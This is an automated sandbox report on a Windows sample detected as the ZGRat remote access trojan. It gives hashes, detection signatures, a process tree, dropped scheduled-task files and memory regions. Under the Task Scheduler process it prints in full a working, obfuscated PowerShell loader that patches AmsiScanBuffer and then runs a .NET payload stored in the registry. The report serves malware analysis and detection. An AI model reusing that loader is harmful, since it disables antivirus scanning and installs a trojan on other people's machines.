Analysis

  • max time kernel
    150s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-05-2024 02:06

General

  • Target

    fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe

  • Size

    4.5MB

  • MD5

    96422a2b982c99614d31dff7f2b64680

  • SHA1

    e8f25aa518b0ef54bcdf770479ef28dd99dd8efc

  • SHA256

    fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16

  • SHA512

    882beba69a0ab2d6f7d048ecb4666b9ba4fe3ea17387ece13fb5bd589ce0db4d7343fbce6e2d836192aed2a920aae4edd1f4b6fa090fe807d54e024dbc234de9

  • SSDEEP

    24576:Epu+lTdASQBeSbtpO2+RZ8XK5OG/wS4gIVnxff9t+oQ9GXiqgbaaz2ub2UbRdL/h:EX

Score
10/10

Malware Config

Signatures

  • Detect ZGRat V1 33 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:668
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
    1⤵
      PID:956
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
      1⤵
        PID:744
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
        1⤵
          PID:896
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
          1⤵
            PID:1064
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
            1⤵
              PID:1108
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
              1⤵
              • Drops file in System32 directory
              PID:1204
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tPwiuzgtHLaD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VNFujcOdhEcLqq,[Parameter(Position=1)][Type]$XUAzdKpsDO)$UBFuRTnJPRU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'efl'+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+'p'+[Char](101)+'','C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$UBFuRTnJPRU.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+'Nam'+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$VNFujcOdhEcLqq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+''+'M'+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$UBFuRTnJPRU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+'Sl'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$XUAzdKpsDO,$VNFujcOdhEcLqq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+'e,'+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+'e'+'d'+'');Write-Output $UBFuRTnJPRU.CreateType();}$VaMTcanOfxBIE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'te'+[Char](109)+''+'.'+''+'d'+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+'f'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+''+'.'+'Un'+[Char](115)+''+[Char](97)+''+'f'+'eN'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'od'+[Char](115)+'');$VXZVbWuwBjekkC=$VaMTcanOfxBIE.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+'ro'+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+'e'+'s'+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TkJKCUWyAPkdSvGjPSH=tPwiuzgtHLaD @([String])([IntPtr]);$ezIECILNJvChcvhVGgCEdC=tPwiuzgtHLaD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CnlPJGGirGM=$VaMTcanOfxBIE.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+'l'+'eHa'+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+'.'+'d'+'ll')));$WQUvaEyNueLdIo=$VXZVbWuwBjekkC.Invoke($Null,@([Object]$CnlPJGGirGM,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+'L'+'i'+''+'b'+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$TpSyVFxzcyhKzUtWk=$VXZVbWuwBjekkC.Invoke($Null,@([Object]$CnlPJGGirGM,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$SsRvezc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WQUvaEyNueLdIo,$TkJKCUWyAPkdSvGjPSH).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$rdQVPHMMLBNKhmtfd=$VXZVbWuwBjekkC.Invoke($Null,@([Object]$SsRvezc,[Object]('A'+[Char](109)+'s'+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'u'+'f'+''+[Char](102)+'er')));$QzBgkdHqOC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TpSyVFxzcyhKzUtWk,$ezIECILNJvChcvhVGgCEdC).Invoke($rdQVPHMMLBNKhmtfd,[uint32]8,4,[ref]$QzBgkdHqOC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rdQVPHMMLBNKhmtfd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TpSyVFxzcyhKzUtWk,$ezIECILNJvChcvhVGgCEdC).Invoke($rdQVPHMMLBNKhmtfd,[uint32]8,0x20,[ref]$QzBgkdHqOC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+''+'a'+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                2⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Drops file in System32 directory
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3292
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
              1⤵
              • Drops file in System32 directory
              PID:1212
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
              1⤵
                PID:1300
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                1⤵
                  PID:1316
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1356
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1452
                    • C:\Windows\system32\sihost.exe
                      sihost.exe
                      2⤵
                        PID:1828
                      • C:\Windows\system32\sihost.exe
                        sihost.exe
                        2⤵
                          PID:2464
                        • C:\Windows\system32\sihost.exe
                          sihost.exe
                          2⤵
                            PID:764
                          • C:\Windows\system32\sihost.exe
                            sihost.exe
                            2⤵
                              PID:1928
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                                PID:2976
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:432
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1484
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1544
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1556
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1656
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1704
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1756
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1780
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1872
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1976
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1988
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:2032
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1832
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                          PID:2052
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2148
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2232
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2272
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2524
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2532
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:2752
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2796
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2824
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2844
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2864
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:2892
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:3180
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                              1⤵
                                                                                PID:3432
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3520
                                                                                • C:\Users\Admin\AppData\Local\Temp\fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe"
                                                                                  2⤵
                                                                                  • Drops startup file
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1808
                                                                                  • C:\Users\Admin\AppData\Local\Temp\$77ef04f5
                                                                                    "C:\Users\Admin\AppData\Local\Temp\$77ef04f5"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2028
                                                                                  • C:\Users\Admin\AppData\Local\Temp\$77c2e67a
                                                                                    "C:\Users\Admin\AppData\Local\Temp\$77c2e67a"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1188
                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                1⤵
                                                                                  PID:4496
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                  1⤵
                                                                                    PID:3312
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                    1⤵
                                                                                      PID:3804
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                      1⤵
                                                                                        PID:1340
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                        1⤵
                                                                                          PID:2836
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                          1⤵
                                                                                            PID:5100
                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:2016
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                            1⤵
                                                                                              PID:512
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                              1⤵
                                                                                                PID:516
                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                1⤵
                                                                                                  PID:3036
                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  1⤵
                                                                                                    PID:4540
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                    1⤵
                                                                                                      PID:1468
                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Checks processor information in registry
                                                                                                      • Enumerates system info in registry
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1836
                                                                                                    • C:\Windows\System32\dllhost.exe
                                                                                                      C:\Windows\System32\dllhost.exe /Processid:{8805baa3-45a8-47ba-9111-4d387c5ffb2a}
                                                                                                      1⤵
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:2504
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                      1⤵
                                                                                                        PID:1448
                                                                                                      • C:\Windows\System32\smss.exe
                                                                                                        \SystemRoot\System32\smss.exe 00000118 00000084
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: LoadsDriver
                                                                                                        PID:1828
                                                                                                      • C:\Windows\System32\smss.exe
                                                                                                        \SystemRoot\System32\smss.exe 000000f4 00000084
                                                                                                        1⤵
                                                                                                          PID:764
                                                                                                        • C:\Windows\System32\smss.exe
                                                                                                          \SystemRoot\System32\smss.exe 000000d8 00000084
                                                                                                          1⤵
                                                                                                            PID:3536
                                                                                                          • C:\Windows\System32\smss.exe
                                                                                                            \SystemRoot\System32\smss.exe 000000f0 00000084
                                                                                                            1⤵
                                                                                                              PID:3292
                                                                                                            • C:\Windows\System32\smss.exe
                                                                                                              \SystemRoot\System32\smss.exe 00000118 00000084
                                                                                                              1⤵
                                                                                                                PID:1188
                                                                                                              • C:\Windows\System32\smss.exe
                                                                                                                \SystemRoot\System32\smss.exe 00000150 00000084
                                                                                                                1⤵
                                                                                                                  PID:3652
                                                                                                                • C:\Windows\System32\smss.exe
                                                                                                                  \SystemRoot\System32\smss.exe 00000160 00000084
                                                                                                                  1⤵
                                                                                                                    PID:4132
                                                                                                                  • C:\Windows\System32\smss.exe
                                                                                                                    \SystemRoot\System32\smss.exe 00000184 00000084
                                                                                                                    1⤵
                                                                                                                      PID:2808
                                                                                                                    • C:\Windows\System32\smss.exe
                                                                                                                      \SystemRoot\System32\smss.exe 0000018c 00000084
                                                                                                                      1⤵
                                                                                                                        PID:3488
                                                                                                                      • C:\Windows\System32\smss.exe
                                                                                                                        \SystemRoot\System32\smss.exe 00000240 00000084
                                                                                                                        1⤵
                                                                                                                          PID:1928
                                                                                                                        • C:\Windows\System32\smss.exe
                                                                                                                          \SystemRoot\System32\smss.exe 00000258 00000084
                                                                                                                          1⤵
                                                                                                                            PID:4532
                                                                                                                          • C:\Windows\System32\smss.exe
                                                                                                                            \SystemRoot\System32\smss.exe 000001a4 00000084
                                                                                                                            1⤵
                                                                                                                              PID:2660
                                                                                                                            • C:\Windows\System32\smss.exe
                                                                                                                              \SystemRoot\System32\smss.exe 000001b0 00000084
                                                                                                                              1⤵
                                                                                                                                PID:3984
                                                                                                                              • C:\Windows\System32\smss.exe
                                                                                                                                \SystemRoot\System32\smss.exe 0000024c 00000084
                                                                                                                                1⤵
                                                                                                                                  PID:616
                                                                                                                                • C:\Windows\System32\smss.exe
                                                                                                                                  \SystemRoot\System32\smss.exe 0000011c 00000084
                                                                                                                                  1⤵
                                                                                                                                    PID:332
                                                                                                                                  • C:\Windows\System32\smss.exe
                                                                                                                                    \SystemRoot\System32\smss.exe 00000114 00000084
                                                                                                                                    1⤵
                                                                                                                                      PID:3836
                                                                                                                                    • C:\Windows\System32\smss.exe
                                                                                                                                      \SystemRoot\System32\smss.exe 00000180 00000084
                                                                                                                                      1⤵
                                                                                                                                        PID:2676
                                                                                                                                      • C:\Windows\System32\smss.exe
                                                                                                                                        \SystemRoot\System32\smss.exe 000000b8 00000084
                                                                                                                                        1⤵
                                                                                                                                          PID:2464
                                                                                                                                        • C:\Windows\System32\smss.exe
                                                                                                                                          \SystemRoot\System32\smss.exe 000000a0 00000084
                                                                                                                                          1⤵
                                                                                                                                            PID:1808

                                                                                                                                          Network

                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                          Discovery

                                                                                                                                          Query Registry

                                                                                                                                          3
                                                                                                                                          T1012

                                                                                                                                          System Information Discovery

                                                                                                                                          2
                                                                                                                                          T1082

                                                                                                                                          Replay Monitor

                                                                                                                                          Loading Replay Monitor...

                                                                                                                                          Downloads

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\$77ef04f5
                                                                                                                                            Filesize

                                                                                                                                            4.5MB

                                                                                                                                            MD5

                                                                                                                                            96422a2b982c99614d31dff7f2b64680

                                                                                                                                            SHA1

                                                                                                                                            e8f25aa518b0ef54bcdf770479ef28dd99dd8efc

                                                                                                                                            SHA256

                                                                                                                                            fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16

                                                                                                                                            SHA512

                                                                                                                                            882beba69a0ab2d6f7d048ecb4666b9ba4fe3ea17387ece13fb5bd589ce0db4d7343fbce6e2d836192aed2a920aae4edd1f4b6fa090fe807d54e024dbc234de9

                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                            Filesize

                                                                                                                                            2KB

                                                                                                                                            MD5

                                                                                                                                            8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                            SHA1

                                                                                                                                            98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                            SHA256

                                                                                                                                            ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                            SHA512

                                                                                                                                            c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                            Filesize

                                                                                                                                            2KB

                                                                                                                                            MD5

                                                                                                                                            f313c5b4f95605026428425586317353

                                                                                                                                            SHA1

                                                                                                                                            06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                            SHA256

                                                                                                                                            129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                            SHA512

                                                                                                                                            b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                            Filesize

                                                                                                                                            2KB

                                                                                                                                            MD5

                                                                                                                                            ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                            SHA1

                                                                                                                                            a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                            SHA256

                                                                                                                                            98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                            SHA512

                                                                                                                                            1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                            Filesize

                                                                                                                                            2KB

                                                                                                                                            MD5

                                                                                                                                            7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                            SHA1

                                                                                                                                            63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                            SHA256

                                                                                                                                            727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                            SHA512

                                                                                                                                            f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                          • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                            Filesize

                                                                                                                                            2KB

                                                                                                                                            MD5

                                                                                                                                            0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                            SHA1

                                                                                                                                            9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                            SHA256

                                                                                                                                            a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                            SHA512

                                                                                                                                            c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                          • C:\Windows\Temp\__PSScriptPolicyTest_wgbhkrtd.c4d.ps1
                                                                                                                                            Filesize

                                                                                                                                            60B

                                                                                                                                            MD5

                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                            SHA1

                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                            SHA256

                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                            SHA512

                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                          • memory/616-4942-0x000001D419660000-0x000001D419685000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            148KB

                                                                                                                                          • memory/616-4944-0x00007FFD9980F000-0x00007FFD99810000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/616-4943-0x00007FFD9980D000-0x00007FFD9980E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/668-5807-0x000001EF866A0000-0x000001EF866C5000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            148KB

                                                                                                                                          • memory/668-4960-0x000001EF866A0000-0x000001EF866C5000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            148KB

                                                                                                                                          • memory/668-4961-0x00007FFD9980D000-0x00007FFD9980E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/744-5808-0x0000025D2A2C0000-0x0000025D2A2E5000-memory.dmp
